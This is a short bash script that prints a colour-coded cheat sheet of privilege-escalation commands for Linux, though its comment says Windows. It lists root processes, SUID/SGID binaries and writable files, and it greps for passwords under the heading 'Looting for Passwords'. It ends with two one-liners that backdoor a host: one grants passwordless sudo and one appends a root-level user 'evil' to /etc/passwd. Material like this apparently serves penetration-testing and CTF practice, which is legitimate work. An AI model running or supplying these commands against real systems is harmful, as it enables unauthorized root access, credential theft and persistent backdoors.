#!/bin/bash

# display commands for manual windows local enumeration

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'


echo -e "${Frame}###${End} ${Title}Root Processes${End} ${Frame}###${End}"
echo -e "${Point} ps aux | grep -i 'root' --color=auto"
echo -e ""


echo -e "${Frame}###${End} ${Title}SUID/SGID${End} ${Frame}###${End}"
echo -e "${Point} find / -perm -u=s -type f 2>/dev/null"
echo -e "${Point} find / -perm -g=s -type f 2>/dev/null"
echo -e ""


echo -e "${Frame}###${End} ${Title}Check writable Files/Diretories${End} ${Frame}###${End}"
echo -e "${Point} find / -perm -2 -type f -exec ls -la {} 2>/dev/null \;"
echo -e ""



echo -e "${Frame}###${End} ${Title}Looting for Passwords${End} ${Frame}###${End}"
echo -e "${Point} grep --color=auto -rn './' -ie \"pass\" --color=always 2>/dev/null"
echo -e ""



echo -e "${Frame}###${End} ${Title}Linux PrivEsc Oneliner-Kill${End} ${Frame}###${End}"
echo -e "${Point} echo \"<user> ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers"
echo -e "${Point} echo \"evil:\$(openssl passwd -1 evil):0:0:root:/root:/bin/bash\" >> /etc/passwd"
echo -e ""